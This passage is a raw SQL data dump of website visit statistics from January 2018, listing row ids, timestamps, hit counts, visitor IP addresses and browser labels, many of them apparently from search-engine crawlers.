,1,1,0,0,'54.36.148.156','other'),(196273,1515508414,1,1,0,0,'54.36.148.178','other'),(196274,1515508552,1,1,0,0,'5.45.207.49','other'),(196275,1515508557,1,1,0,0,'91.196.177.46','other'),(196276,1515508603,1,1,0,0,'95.108.181.111','other'),(196277,1515508639,1,1,0,0,'141.8.142.50','other'),(196278,1515508801,1,1,0,0,'91.196.177.46','chrome'),(196279,1515509083,1,1,0,0,'37.54.172.164','chrome'),(196280,1515509188,1,1,0,0,'51.255.71.121','other'),(196281,1515509225,1,1,0,0,'37.52.167.234','chrome'),(196282,1515509369,1,1,0,0,'54.36.148.89','other'),(196283,1515509482,1,1,0,0,'91.196.178.70','chrome'),(196284,1515509514,1,1,0,0,'178.154.171.60','other'),(196285,1515509594,1,1,0,0,'178.154.171.24','other'),(196286,1515509708,1,1,0,0,'54.36.148.35','other'),(196287,1515509814,1,1,0,0,'87.250.224.77','other'),(196288,1515509818,1,1,0,0,'37.9.113.138','other'),(196289,1515510445,1,1,0,0,'46.211.104.4','other'),(196290,1515510525,1,1,0,0,'37.9.113.63','other'),(196291,1515510623,1,1,0,0,'89.178.231.84','chrome'),(196292,1515510894,1,1,0,0,'141.8.142.50','other'),(196293,1515510997,1,1,0,0,'54.165.59.7','other'),(196294,1515511119,1,1,0,0,'51.255.71.120','other'),(196295,1515511185,1,1,0,0,'54.36.148.10','other'),(196296,1515511320,1,1,0,0,'54.36.149.86','other'),(196297,1515511512,1,1,0,0,'5.255.253.35','other'),(196298,1515511552,1,1,0,0,'54.36.148.122','other'),(196299,1515511789,1,1,0,0,'87.250.224.90','other'),(196300,1515512307,1,1,0,0,'91.196.178.68','firefox'),(196301,1515512490,1,1,0,0,'54.36.148.155','other'),(196302,1515512535,1,0,1,0,'66.249.66.156',''),(196303,1515512920,1,1,0,0,'54.36.148.238','other'),(196304,1515513049,1,1,0,0,'141.8.132.19','other'),(196305,1515513152,1,1,0,0,'141.8.142.50','other'),(196306,1515513187,1,1,0,0,'8.29.198.26','other'),(196307,1515513633,1,1,0,0,'91.196.178.167','chrome'),(196308,1515513745,1,1,0,0,'54.36.148.37','other'),(196309,1515514333,2,2,0,0,'5.45.207.49','other'),(196310,1515514494,1,0,1,0,'66.249.66.157',''),(196311,1515514581,2,2,0,0,'37.9.113.182','other'),(196312,1515514592,1,1,0,0,'141.8.132.22','other'),(196313,1515514603,1,1,0,0,'37.9.113.63','other'),(196314,1515514623,1,1,0,0,'54.36.148.248','other'),(196315,1515514751,1,1,0,0,'87.250.224.125','other'),(196316,1515514789,1,1,0,0,'54.36.148.94','other'),(196317,1515514955,1,1,0,0,'54.36.148.16','other'),(196318,1515515038,1,1,0,0,'5.255.253.35','other'),(196319,1515515380,1,1,0,0,'213.180.203.8','other'),(196320,1515515683,2,2,0,0,'178.154.171.88','other'),(196321,1515515988,2,2,0,0,'141.8.142.74','other'),(196322,1515516241,1,1,0,0,'37.9.113.182','other'),(196323,1515516691,2,2,0,0,'178.154.171.88','other'),(196324,1515516692,1,1,0,0,'217.69.133.194','other'),(196325,1515516958,1,1,0,0,'157.55.39.220','other'),(196326,1515517045,1,1,0,0,'54.36.149.81','other'),(196327,1515517522,1,1,0,0,'54.36.148.104','other'),(196328,1515517601,1,1,0,0,'187.95.28.7','other'),(196329,1515517626,1,1,0,0,'178.154.171.88','other'),(196330,1515517652,1,1,0,0,'37.99.79.149','other'),(196331,1515517670,1,1,0,0,'91.109.190.5','other'),(196332,1515517676,1,1,0,0,'54.36.148.80','other'),(196333,1515517748,1,1,0,0,'54.36.148.151','other'),(196334,1515517782,1,1,0,0,'37.9.113.182','other'),(196335,1515517794,1,1,0,0,'113.88.160.202','firefox'),(196336,1515517849,1,1,0,0,'141.8.132.19','other'),(196337,1515517985,1,1,0,0,'54.36.148.74','other'),(196338,1515517988,1,1,0,0,'37.9.113.100','other'),(196339,1515518054,1,1,0,0,'54.36.149.72','other'),(196340,1515518279,2,2,0,0,'37.9.113.101','other'),(196341,1515518411,2,2,0,0,'141.8.142.74','other'),(196342,1515518608,1,1,0,0,'87.250.224.46','other'),(196343,1515518669,1,1,0,0,'54.36.148.54','other'),(196344,1515518885,1,0,1,0,'66.249.66.157',''),(196345,1515519064,1,0,1,0,'66.249.66.155',''),(196346,1515519515,1,1,0,0,'54.36.148.63','other'),(196347,1515519668,1,1,0,0,'217.69.134.174','other'),(196348,1515519744,1,1,0,0,'178.154.171.88','other'),(196349,1515519809,1,1,0,0,'217.69.133.9','other'),(196350,1515519954,1,1,0,0,'54.36.149.9','other'),(196351,1515520002,1,1,0,0,'54.36.148.229','other'),(196352,1515520128,2,2,0,0,'141.8.142.74','other'),(196353,1515520142,1,1,0,0,'31.184.236.104','chrome'),(196354,1515520416,1,1,0,0,'54.36.149.105','other'),(196355,1515520462,1,1,0,0,'51.255.71.116','other'),(196356,1515520841,1,1,0,0,'107.167.104.162','other'),(196357,1515521385,1,1,0,0,'141.8.142.74','other'),(196358,1515521545,1,1,0,0,'54.36.148.27','other'),(196359,1515521645,1,1,0,0,'54.36.149.59','other'),(196360,1515521714,1,1,0,0,'37.9.113.182','other'),(196361,1515522296,1,1,0,0,'141.8.142.74','other'),(196362,1515522359,1,1,0,0,'54.36.148.142','other'),(196363,1515522631,1,1,0,0,'54.36.148.121','other'),(196364,1515522664,1,0,1,0,'66.249.66.157',''),(196365,1515522807,1,1,0,0,'108.59.8.70','other'),(196366,1515522846,1,1,0,0,'54.36.148.145','other'),(196367,1515522871,1,1,0,0,'178.154.171.88','other'),(196368,1515523791,1,0,1,0,'66.249.66.155',''),(196369,1515524013,1,1,0,0,'8.29.198.25','other'),(196370,1515524293,1,1,0,0,'188.230.43.254','other'),(196371,1515524816,1,1,0,0,'54.36.148.134','other'),(196372,1515524881,1,1,0,0,'207.46.13.173','other'),(196373,1515524901,1,1,0,0,'141.8.142.74','other'),(196374,1515525173,1,1,0,0,'87.250.224.46','other'),(196375,1515525224,1,1,0,0,'95.158.33.144','chrome'),(196376,1515525598,1,1,0,0,'54.36.149.37','other'),(196377,1515525711,1,1,0,0,'130.180.209.198','chrome'),(196378,1515525803,1,1,0,0,'91.196.178.68','firefox'),(196379,1515526053,1,1,0,0,'54.36.148.158','other'),(196380,1515526185,1,1,0,0,'46.201.68.217','chrome'),(196381,1515526254,1,1,0,0,'141.8.142.74','other'),(196382,1515526428,1,1,0,0,'54.36.148.152','other'),(196383,1515526489,1,1,0,0,'87.250.224.46','other'),(196384,1515526493,2,2,0,0,'37.9.113.182','other'),(196385,1515526688,1,1,0,0,'188.230.43.254','other'),(196386,1515526706,1,1,0,0,'178.154.171.88','other'),(196387,1515527211,1,1,0,0,'141.8.142.74','other'),(196388,1515527389,1,1,0,0,'54.36.148.126','other'),(196389,1515527642,1,1,0,0,'54.36.149.2','other'),(196390,1515528071,1,1,0,0,'40.77.167.24','other'),(196391,1515528094,1,1,0,0,'93.75.8.57','firefox'),(196392,1515528218,1,1,0,0,'54.36.148.201','other'),(196393,1515528605,1,1,0,0,'40.77.167.124','other'),(196394,1515528667,1,1,0,0,'54.36.148.189','other'),(196395,1515528699,1,1,0,0,'54.36.148.239','other'),(196396,1515528955,1,1,0,0,'141.8.142.74','other'),(196397,1515528959,1,1,0,0,'87.250.224.46','other'),(196398,1515529051,2,2,0,0,'178.154.171.88','other'),(196399,1515529065,1,1,0,0,'54.36.148.61','other'),(196400,1515529085,1,1,0,0,'188.230.43.254','other'),(196401,1515529348,1,1,0,0,'54.36.148.47','other'),(196402,1515529620,1,1,0,0,'54.36.149.49','other'),(196403,1515530185,1,1,0,0,'54.36.148.206','other'),(196404,1515530647,1,1,0,0,'54.36.149.86','other'),(196405,1515530787,1,1,0,0,'54.36.148.32','other'),(196406,1515531015,1,1,0,0,'54.36.148.22','other'),(196407,1515531133,1,1,0,0,'54.36.148.47','other'),(196408,1515531270,1,1,0,0,'54.36.148.134','other'),(196409,1515531556,1,1,0,0,'141.8.142.74','other'),(196410,1515531738,1,1,0,0,'217.69.133.68','other'),(196411,1515531947,1,1,0,0,'54.36.148.71','other'),(196412,1515531954,1,1,0,0,'54.36.148.142','other'),(196413,1515532173,1,1,0,0,'54.36.148.248','other'),(196414,1515532219,1,1,0,0,'54.36.148.249','other'),(196415,1515532715,1,1,0,0,'54.36.149.55','other'),(196416,1515532836,1,1,0,0,'178.95.156.151','chrome'),(196417,1515533751,1,1,0,0,'87.250.224.46','other'),(196418,1515534033,1,1,0,0,'54.36.149.23','other'),(196419,1515534270,1,1,0,0,'54.36.148.128','other'),(196420,1515534635,2,2,0,0,'141.8.142.74','other'),(196421,1515534842,1,1,0,0,'8.29.198.27','other'),(196422,1515534856,1,1,0,0,'54.36.148.203','other'),(196423,1515535099,1,1,0,0,'40.77.167.124','other'),(196424,1515535125,1,1,0,0,'54.36.148.126','other'),(196425,1515535362,1,1,0,0,'157.55.39.220','other'),(196426,1515535460,1,1,0,0,'87.250.224.46','other'),(196427,1515535504,1,1,0,0,'178.154.171.88','other'),(196428,1515535531,1,1,0,0,'54.36.148.85','other'),(196429,1515535996,1,1,0,0,'54.36.148.100','other'),(196430,1515536192,1,1,0,0,'54.36.148.155','other'),(196431,1515536241,1,1,0,0,'54.36.148.241','other'),(196432,1515536412,1,0,1,0,'66.249.66.155',''),(196433,1515537539,1,1,0,0,'51.255.71.129','other'),(196434,1515537823,1,1,0,0,'217.69.134.160','other'),(196435,1515538872,1,1,0,0,'54.36.148.139','other'),(196436,1515538904,1,1,0,0,'54.36.149.23','other'),(196437,1515539274,1,1,0,0,'141.8.142.74','other'),(196438,1515539344,1,1,0,0,'37.9.113.182','other'),(196439,1515539862,1,1,0,0,'54.36.148.24','other'),(196440,1515540321,1,1,0,0,'54.36.149.4','other'),(196441,1515540423,1,1,0,0,'54.36.148.189','other'),(196442,1515540663,1,1,0,0,'51.255.71.123','other'),(196443,1515541319,1,1,0,0,'54.36.149.20','other'),(196444,1515541427,1,1,0,0,'54.36.148.229','other'),(196445,1515541595,1,1,0,0,'54.36.148.22','other'),(196446,1515541973,1,1,0,0,'157.55.39.220','other'),(196447,1515541974,1,1,0,0,'54.36.148.83','other'),(196448,1515542058,1,1,0,0,'54.36.148.103','other'),(196449,1515542655,2,2,0,0,'54.36.149.85','other'),(196450,1515542660,2,2,0,0,'54.36.149.29','other'),(196451,1515543913,1,1,0,0,'54.36.149.69','other'),(196452,1515543975,1,1,0,0,'176.14.37.74','msie'),(196453,1515543982,1,1,0,0,'54.36.148.196','other'),(196454,1515544023,1,1,0,0,'54.36.148.75','other'),(196455,1515544408,1,0,1,0,'66.249.66.156',''),(196456,1515544544,1,1,0,0,'54.36.149.0','other'),(196457,1515544798,1,1,0,0,'66.249.81.67','chrome'),(196458,1515545173,1,1,0,0,'207.46.13.147','other'),(196459,1515545276,1,1,0,0,'66.249.66.75','chrome'),(196460,1515545288,1,0,1,0,'66.249.66.76',''),(196461,1515545312,1,1,0,0,'66.249.66.156','chrome'),(196462,1515545397,1,1,0,0,'54.36.148.149','other'),(196463,1515545630,1,1,0,0,'54.36.148.248','other'),(196464,1515545689,1,1,0,0,'8.29.198.27','other'),(196465,1515546318,1,1,0,0,'54.36.149.54','other'),(196466,1515546874,1,1,0,0,'54.36.148.199','other'),(196467,1515546984,1,1,0,0,'40.77.167.124','other'),(196468,1515546990,1,1,0,0,'54.36.148.96','other'),(196469,1515547453,1,1,0,0,'54.36.148.159','other'),(196470,1515547457,1,1,0,0,'54.36.149.33','other'),(196471,1515547717,1,1,0,0,'54.36.148.161','other'),(196472,1515547926,2,0,2,0,'66.249.69.103',''),(196473,1515548162,1,1,0,0,'54.36.148.125','other'),(196474,1515548462,1,1,0,0,'54.36.148.165','other'),(196475,1515548624,1,1,0,0,'54.36.148.244','other'),(196476,1515548819,1,1,0,0,'54.36.148.34','other'),(196477,1515549095,1,1,0,0,'54.36.148.234','other'),(196478,1515549117,1,1,0,0,'54.36.148.55','other'),(196479,1515549200,1,1,0,0,'54.36.148.201','other'),(196480,1515549474,1,0,1,0,'66.249.79.9',''),(196481,1515549840,1,1,0,0,'207.46.13.173','other'),(196482,1515549974,1,1,0,0,'54.36.148.165','other'),(196483,1515550114,1,1,0,0,'54.36.149.67','other'),(196484,1515550258,1,1,0,0,'54.36.149.73','other'),(196485,1515550264,1,1,0,0,'54.36.149.95','other'),(196486,1515550435,1,1,0,0,'54.36.148.172','other'),(196487,1515550491,1,0,1,0,'66.249.79.5',''),(196488,1515550799,1,1,0,0,'207.46.13.147','other'),(196489,1515551146,1,1,0,0,'51.255.71.118','other'),(196490,1515551193,1,1,0,0,'54.36.148.87','other'),(196491,1515551359,1,1,0,0,'54.36.148.90','other'),(196492,1515551382,1,1,0,0,'54.36.148.56','other'),(196493,1515551524,1,1,0,0,'54.36.148.46','other'),(196494,1515551670,1,1,0,0,'66.249.79.5','chrome'),(196495,1515551763,1,1,0,0,'54.36.148.58','other'),(196496,1515552372,1,1,0,0,'54.36.148.142','other'),(196497,1515552811,1,1,0,0,'157.55.39.220','other'),(196498,1515552947,1,1,0,0,'155.94.178.199','other'),(196499,1515553070,1,1,0,0,'207.46.13.173','other'),(196500,1515553409,1,1,0,0,'54.36.149.96','other'),(196501,1515553817,1,1,0,0,'157.55.39.220','other'),(196502,1515553993,1,1,0,0,'54.36.148.132','other'),(196503,1515554872,1,1,0,0,'54.36.148.78','other'),(196504,1515555254,1,1,0,0,'54.36.148.239','other'),(196505,1515555300,1,1,0,0,'54.36.148.74','other'),(196506,1515555613,1,1,0,0,'54.36.148.130','other'),(196507,1515556205,1,1,0,0,'54.36.148.119','other'),(196508,1515556314,1,1,0,0,'54.36.148.73','other'),(196509,1515556526,1,1,0,0,'8.29.198.27','other'),(196510,1515556638,1,1,0,0,'54.36.148.107','other'),(196511,1515557152,2,2,0,0,'46.133.194.148','other'),(196512,1515557909,1,1,0,0,'54.36.149.71','other'),(196513,1515558862,1,1,0,0,'51.255.71.119','other'),(196514,1515558946,1,1,0,0,'54.36.148.45','other'),(196515,1515559059,1,1,0,0,'54.36.149.30','other'),(196516,1515559531,1,1,0,0,'54.36.148.151','other'),(196517,1515560425,1,1,0,0,'157.55.39.220','other'),(196518,1515560482,1,1,0,0,'54.36.149.88','other'),(196519,1515561286,1,0,1,0,'66.249.66.157',''),(196520,1515561612,1,1,0,0,'54.36.149.20','other'),(196521,1515561712,1,1,0,0,'54.36.148.89','other'),(196522,1515561721,1,1,0,0,'54.36.149.32','other'),(196523,1515562061,1,1,0,0,'54.36.148.31','other'),(196524,1515562286,1,1,0,0,'54.36.149.104','other'),(196525,1515562395,1,1,0,0,'54.36.148.238','other'),(196526,1515563202,1,1,0,0,'54.36.148.54','other'),(196527,1515563265,10,10,0,0,'69.58.178.58','other'),(196528,1515563782,1,1,0,0,'54.36.149.100','other'),(196529,1515564151,1,1,0,0,'54.36.149.80','other'),(196530,1515564645,1,1,0,0,'54.36.149.96','other'),(196531,1515564671,1,1,0,0,'54.36.148.166','other'),(196532,1515565010,1,1,0,0,'54.36.149.66','other'),(196533,1515565951,1,1,0,0,'37.54.172.164','chrome'),(196534,1515566078,1,1,0,0,'91.196.178.65','chrome'),(196535,1515566370,1,1,0,0,'54.36.148.58','other'),(196536,1515566489,13,13,0,0,'62.210.251.247','other'),(196537,1515566886,1,1,0,0,'54.36.148.207','other'),(196538,1515566994,1,1,0,0,'91.196.178.68','chrome'),(196539,1515567139,1,1,0,0,'91.196.178.65','chrome'),(196540,1515567358,1,1,0,0,'8.29.198.25','other'),(196541,1515567893,1,1,0,0,'54.36.148.178','other'),(196542,1515568002,1,1,0,0,'54.36.149.11','other'),(196543,1515568014,1,1,0,0,'91.196.178.68','chrome'),(196544,1515568067,1,1,0,0,'195.230.119.34','chrome'),(196545,1515568493,1,1,0,0,'54.36.148.97','other'),(196546,1515568755,1,1,0,0,'207.46.13.173','other'),(196547,1515568831,1,1,0,0,'92.112.201.106','chrome'),(196548,1515569003,1,1,0,0,'54.36.149.64','other'),(196549,1515569066,1,1,0,0,'54.36.148.241','other'),(196550,1515569081,1,1,0,0,'54.36.148.103','other'),(196551,1515569169,1,1,0,0,'91.196.178.68','chrome'),(196552,1515569712,1,1,0,0,'54.36.148.121','other'),(196553,1515570074,1,1,0,0,'37.55.176.227','firefox'),(196554,1515570107,1,1,0,0,'91.196.178.68','chrome'),(196555,1515570172,1,1,0,0,'54.36.149.9','other'),(196556,1515570349,1,1,0,0,'54.36.148.73','other'),(196557,1515570641,1,1,0,0,'51.255.71.121','other'),(196558,1515570740,1,1,0,0,'54.36.148.52','other'),(196559,1515571035,1,1,0,0,'91.196.178.165','chrome'),(196560,1515571844,1,1,0,0,'54.36.148.176','other'),(196561,1515571909,1,1,0,0,'54.36.149.75','other'),(196562,1515572111,1,1,0,0,'54.36.148.83','other'),(196563,1515572222,1,1,0,0,'91.196.178.165','chrome'),(196564,1515572271,1,1,0,0,'91.196.178.65','chrome'),(196565,1515572472,1,1,0,0,'74.115.214.155','other'),(196566,1515572619,1,1,0,0,'54.36.149.97','other'),(196567,1515572843,1,0,1,0,'66.249.66.157',''),(196568,1515573172,1,1,0,0,'54.36.149.86','other'),(196569,1515573656,1,1,0,0,'54.36.148.77','other'),(196570,1515573803,1,1,0,0,'54.36.148.170','other'),(196571,1515574049,1,1,0,0,'82.145.222.3','chrome'),(196572,1515574482,1,1,0,0,'95.132.11.34','firefox'),(196573,1515574902,1,1,0,0,'95.134.36.1','chrome'),(196574,1515575096,1,1,0,0,'54.36.149.60','other'),(196575,1515575134,1,1,0,0,'91.196.178.65','firefox'),(196576,1515575272,1,1,0,0,'37.54.58.123','chrome'),(196577,1515575572,1,1,0,0,'54.36.148.202','other'),(196578,1515575639,1,1,0,0,'94.178.76.104','chrome'),(196579,1515575714,1,1,0,0,'54.36.148.65','other'),(196580,1515575778,1,1,0,0,'91.196.178.35','chrome'),(196581,1515575810,1,1,0,0,'54.36.148.21','other'),(196582,1515575924,1,1,0,0,'207.46.13.173','other'),(196583,1515576207,1,1,0,0,'54.36.149.37','other'),(196584,1515576720,1,1,0,0,'178.154.171.88','other'),(196585,1515576722,1,1,0,0,'141.8.142.74','other'),(196586,1515576774,1,1,0,0,'31.13.113.91','other'),(196587,1515577074,1,1,0,0,'54.36.148.143','other'),(196588,1515577124,1,1,0,0,'54.36.149.54','other'),(196589,1515577461,1,1,0,0,'141.8.132.19','other'),(196590,1515577464,1,1,0,0,'37.9.113.182','other'),(196591,1515577710,1,0,1,0,'66.249.66.155',''),(196592,1515577752,1,1,0,0,'51.255.71.130','other'),(196593,1515577756,2,2,0,0,'141.8.142.74','other'),(196594,1515577920,1,1,0,0,'54.36.148.57','other'),(196595,1515578080,1,1,0,0,'54.36.149.40','other'),(196596,1515578095,1,1,0,0,'178.154.171.88','other'),(196597,1515578200,1,1,0,0,'8.29.198.27','other'),(196598,1515578297,1,1,0,0,'157.55.39.105','other'),(196599,1515578541,1,1,0,0,'54.36.148.242','other'),(196600,1515578577,1,1,0,0,'54.36.149.92','other'),(196601,1515578605,1,1,0,0,'54.36.148.229','other'),(196602,1515578741,1,1,0,0,'37.9.113.182','other'),(196603,1515578899,1,1,0,0,'95.134.202.192','chrome'),(196604,1515578935,1,1,0,0,'54.36.148.235','other'),(196605,1515579135,1,1,0,0,'80.254.155.43','chrome'),(196606,1515579146,1,1,0,0,'185.126.252.140','chrome'),(196607,1515579382,1,1,0,0,'54.36.149.95','other'),(196608,1515579387,1,1,0,0,'87.250.224.46','other'),(196609,1515579692,1,1,0,0,'95.134.202.192','firefox'),(196610,1515580043,3,3,0,0,'141.8.142.74','other'),(196611,1515580148,1,1,0,0,'82.207.114.136','firefox'),(196612,1515580880,1,1,0,0,'54.36.148.123','other'),(196613,1515580909,1,1,0,0,'54.36.148.243','other'),(196614,1515581092,1,1,0,0,'54.36.148.251','other'),(196615,1515581125,1,1,0,0,'51.255.71.121','other'),(196616,1515581363,2,2,0,0,'178.154.171.88','other'),(196617,1515581440,1,1,0,0,'54.36.149.107','other'),(196618,1515581459,1,1,0,0,'54.36.148.232','other'),(196619,1515581740,1,1,0,0,'54.36.148.23','other'),(196620,1515581954,1,1,0,0,'54.36.148.52','other'),(196621,1515582028,1,1,0,0,'194.44.170.193','chrome'),(196622,1515582033,1,1,0,0,'141.8.142.74','other'),(196623,1515582344,1,1,0,0,'216.244.66.237','other'),(196624,1515582712,1,1,0,0,'87.250.224.46','other'),(196625,1515582868,1,1,0,0,'54.36.148.130','other'),(196626,1515583191,1,1,0,0,'54.36.149.16','other'),(196627,1515583197,1,1,0,0,'54.36.148.157','other'),(196628,1515583301,1,1,0,0,'54.36.148.150','other'),(196629,1515583348,2,2,0,0,'141.8.142.74','other'),(196630,1515583476,1,1,0,0,'207.46.13.59','other'),(196631,1515583682,1,1,0,0,'54.36.148.199','other'),(196632,1515583959,1,1,0,0,'95.134.202.192','chrome'),(196633,1515584295,1,1,0,0,'54.36.148.36','other'),(196634,1515584495,1,1,0,0,'54.36.148.114','other'),(196635,1515584712,1,1,0,0,'54.36.148.236','other'),(196636,1515584766,2,2,0,0,'141.8.142.74','other'),(196637,1515584784,1,1,0,0,'54.36.148.32','other'),(196638,1515585464,1,1,0,0,'178.154.171.88','other'),(196639,1515585605,1,1,0,0,'54.36.148.200','other'),(196640,1515585653,1,1,0,0,'91.204.196.164','chrome'),(196641,1515586170,1,1,0,0,'141.8.142.74','other'),(196642,1515586329,1,1,0,0,'94.179.147.98','chrome'),(196643,1515586501,1,1,0,0,'54.36.148.196','other'),(196644,1515586823,1,1,0,0,'54.36.149.76','other'),(196645,1515586882,1,1,0,0,'37.9.113.182','other'),(196646,1515587162,1,0,1,0,'66.249.79.9',''),(196647,1515587590,1,1,0,0,'141.8.142.74','other'),(196648,1515587681,1,1,0,0,'91.196.178.68','chrome'),(196649,1515587876,2,2,0,0,'178.154.171.88','other'),(196650,1515587924,1,1,0,0,'31.172.142.179','chrome'),(196651,1515588157,1,1,0,0,'54.36.148.47','other'),(196652,1515588270,1,1,0,0,'54.36.148.130','other'),(196653,1515588509,3,3,0,0,'141.8.142.74','other'),(196654,1515588779,1,1,0,0,'91.196.178.53','chrome'),(196655,1515588949,1,1,0,0,'91.196.178.68','chrome'),(196656,1515589040,1,1,0,0,'54.36.148.99','other'),(196657,1515589058,1,1,0,0,'8.29.198.27','other'),(196658,1515589228,1,1,0,0,'51.255.71.131','other'),(196659,1515589548,1,1,0,0,'54.36.149.96','other'),(196660,1515589549,1,1,0,0,'54.36.148.92','other'),(196661,1515589795,3,3,0,0,'141.8.142.74','other'),(196662,1515590125,1,1,0,0,'40.77.167.56','other'),(196663,1515590609,1,1,0,0,'54.36.149.55','other'),(196664,1515590822,1,1,0,0,'54.36.148.21','other'),(196665,1515590880,1,1,0,0,'54.36.148.34','other'),(196666,1515590986,1,1,0,0,'141.8.142.74','other'),(196667,1515591482,1,1,0,0,'54.36.148.40','other'),(196668,1515591660,1,1,0,0,'178.154.171.88','other'),(196669,1515591761,1,1,0,0,'87.250.244.122','firefox'),(196670,1515591763,1,1,0,0,'93.158.158.73','chrome'),(196671,1515591802,1,1,0,0,'54.36.148.168','other'),(196672,1515591861,1,1,0,0,'54.36.148.113','other'),(196673,1515592104,1,1,0,0,'94.178.65.70','chrome'),(196674,1515592173,1,1,0,0,'54.36.148.147','other'),(196675,1515592184,1,1,0,0,'87.250.224.46','other'),(196676,1515592369,1,1,0,0,'216.244.66.237','other'),(196677,1515592979,1,1,0,0,'141.8.142.74','other'),(196678,1515593240,1,1,0,0,'91.196.178.165','chrome'),(196679,1515593559,1,1,0,0,'54.36.148.144','other'),(196680,1515593909,1,1,0,0,'194.146.110.121','chrome'),(196681,1515594059,1,1,0,0,'54.36.149.17','other'),(196682,1515594322,1,1,0,0,'141.8.142.74','other'),(196683,1515594580,1,1,0,0,'51.255.71.120','other'),(196684,1515594609,1,1,0,0,'216.244.66.237','other'),(196685,1515594966,1,1,0,0,'178.154.171.88','other'),(196686,1515595014,1,1,0,0,'54.36.148.61','other'),(196687,1515595107,1,1,0,0,'37.9.113.182','other'),(196688,1515595254,1,1,0,0,'54.36.149.88','other'),(196689,1515595403,1,1,0,0,'54.36.148.47','other'),(196690,1515595531,1,1,0,0,'87.250.224.46','other'),(196691,1515595564,1,1,0,0,'91.196.178.165','chrome'),(196692,1515595602,1,0,1,0,'66.249.79.5',''),(196693,1515596196,1,1,0,0,'95.132.60.203','chrome'),(196694,1515596478,2,2,0,0,'37.9.113.182','other'),(196695,1515596523,1,1,0,0,'194.79.11.98','firefox'),(196696,1515596569,1,1,0,0,'54.36.148.106','other'),(196697,1515596605,1,1,0,0,'40.77.167.56','other'),(196698,1515596835,2,2,0,0,'195.211.175.37','chrome'),(196699,1515596987,1,1,0,0,'54.36.148.93','other'),(196700,1515597018,1,1,0,0,'216.244.66.237','other'),(196701,1515597264,1,1,0,0,'188.230.43.254','other'),(196702,1515597464,1,1,0,0,'54.36.148.39','other'),(196703,1515597510,1,1,0,0,'92.113.25.108','chrome'),(196704,1515598205,1,0,1,0,'66.249.79.89',''),(196705,1515598223,1,1,0,0,'194.44.179.185','chrome'),(196706,1515598234,1,1,0,0,'66.249.79.7','chrome'),(196707,1515598244,1,1,0,0,'66.249.79.89','chrome'),(196708,1515598337,1,1,0,0,'54.36.148.244','other'),(196709,1515598672,1,1,0,0,'37.9.113.182','other'),(196710,1515598710,1,1,0,0,'91.196.178.66','firefox'),(196711,1515598756,1,1,0,0,'82.117.245.40','chrome'),(196712,1515599054,1,1,0,0,'178.154.171.88','other'),(196713,1515599275,1,1,0,0,'87.250.224.46','other'),(196714,1515599320,1,1,0,0,'51.255.71.117','other'),(196715,1515599414,1,1,0,0,'162.210.196.130','other'),(196716,1515599661,1,1,0,0,'95.133.152.214','chrome'),(196717,1515599664,1,1,0,0,'188.230.43.254','other'),(196718,1515599891,1,1,0,0,'8.29.198.27','other'),(196719,1515599939,1,1,0,0,'51.255.71.118','other'),(196720,1515600115,1,1,0,0,'157.55.39.43','other'),(196721,1515600619,1,1,0,0,'54.36.148.37','other'),(196722,1515600714,1,1,0,0,'54.36.148.23','other'),(196723,1515600830,1,1,0,0,'141.8.142.74','other'),(196724,1515600940,1,1,0,0,'54.36.149.76','other'),(196725,1515600993,1,0,1,0,'66.249.79.5',''),(196726,1515601023,1,1,0,0,'54.36.149.88','other'),(196727,1515601124,1,1,0,0,'82.196.1.179','chrome'),(196728,1515601156,1,1,0,0,'54.36.148.77','other'),(196729,1515601203,1,1,0,0,'54.36.148.43','other'),(196730,1515601229,1,0,1,0,'66.249.79.7',''),(196731,1515601480,1,1,0,0,'91.196.178.100','chrome'),(196732,1515601647,1,1,0,0,'51.255.71.118','other'),(196733,1515601833,1,1,0,0,'54.36.148.37','other'),(196734,1515602063,1,1,0,0,'188.230.43.254','other'),(196735,1515602253,1,1,0,0,'54.36.149.70','other'),(196736,1515602372,2,2,0,0,'141.8.142.74','other'),(196737,1515602552,1,1,0,0,'91.196.178.42','chrome'),(196738,1515603575,1,1,0,0,'54.36.149.75','other'),(196739,1515603978,1,1,0,0,'188.230.43.254','other'),(196740,1515603982,1,1,0,0,'54.36.149.67','other'),(196741,1515604066,1,1,0,0,'178.154.171.88','other'),(196742,1515604106,1,1,0,0,'54.36.148.166','other'),(196743,1515604331,1,1,0,0,'54.36.148.41','other'),(196744,1515604527,1,1,0,0,'54.36.148.12','other'),(196745,1515604626,1,1,0,0,'74.115.214.156','other'),(196746,1515604848,1,1,0,0,'54.36.149.6','other'),(196747,1515604926,1,1,0,0,'54.36.148.255','other'),(196748,1515605134,1,1,0,0,'54.36.148.15','other'),(196749,1515605352,1,1,0,0,'54.36.149.84','other'),(196750,1515605573,1,1,0,0,'178.154.171.88','other'),(196751,1515605743,1,1,0,0,'91.196.178.29','chrome'),(196752,1515606184,1,1,0,0,'91.196.178.164','chrome'),(196753,1515606944,1,1,0,0,'188.230.43.254','other'),(196754,1515607113,1,1,0,0,'87.250.224.46','other'),(196755,1515607118,1,1,0,0,'178.154.171.88','other'),(196756,1515607154,1,1,0,0,'54.36.148.92','other'),(196757,1515607296,1,1,0,0,'54.36.149.51','other'),(196758,1515607688,1,1,0,0,'54.36.148.168','other'),(196759,1515607783,10,10,0,0,'46.4.0.246','other'),(196760,1515608247,1,1,0,0,'91.124.180.188','chrome'),(196761,1515608444,1,1,0,0,'95.133.150.136','chrome'),(196762,1515608505,1,1,0,0,'54.36.148.155','other'),(196763,1515608655,2,2,0,0,'178.154.171.88','other'),(196764,1515608693,1,1,0,0,'46.211.115.171','chrome'),(196765,1515609292,1,1,0,0,'91.124.180.188','chrome'),(196766,1515609450,1,1,0,0,'40.77.167.56','other'),(196767,1515609866,1,1,0,0,'51.255.71.116','other'),(196768,1515609928,1,1,0,0,'54.36.148.162','other'),(196769,1515610228,1,1,0,0,'178.154.171.88','other'),(196770,1515610324,1,1,0,0,'51.255.71.117','other'),(196771,1515610333,1,1,0,0,'51.255.71.115','other'),(196772,1515610510,1,1,0,0,'54.36.148.40','other'),(196773,1515610555,1,1,0,0,'31.42.161.203','chrome'),(196774,1515610728,1,1,0,0,'8.29.198.27','other'),(196775,1515611086,1,1,0,0,'46.211.120.150','chrome'),(196776,1515611087,1,1,0,0,'54.36.149.77','other'),(196777,1515611440,1,1,0,0,'188.163.17.121','chrome'),(196778,1515611809,1,1,0,0,'141.8.142.74','other'),(196779,1515611980,1,1,0,0,'54.36.149.21','other'),(196780,1515612425,1,1,0,0,'54.36.148.72','other'),(196781,1515613280,1,1,0,0,'87.250.224.46','other'),(196782,1515613439,1,1,0,0,'54.36.148.95','other'),(196783,1515613641,1,1,0,0,'54.36.149.22','other'),(196784,1515613794,1,1,0,0,'5